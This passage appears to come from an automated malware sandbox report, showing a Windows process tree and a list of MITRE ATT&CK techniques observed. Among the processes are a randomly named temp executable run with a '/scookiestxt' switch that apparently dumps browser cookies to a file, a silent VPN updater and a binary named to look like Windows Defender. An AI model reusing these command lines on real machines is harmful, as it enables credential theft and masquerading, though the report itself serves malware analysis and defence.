        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6912
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2068

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:5472
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{01c7bc50-d236-5c4a-938b-39339716c632}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4688
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
  2⤵
  PID:5932

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5028

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:4260

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:6072

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6216
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:5836

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3076

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Bootkit

T1067

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery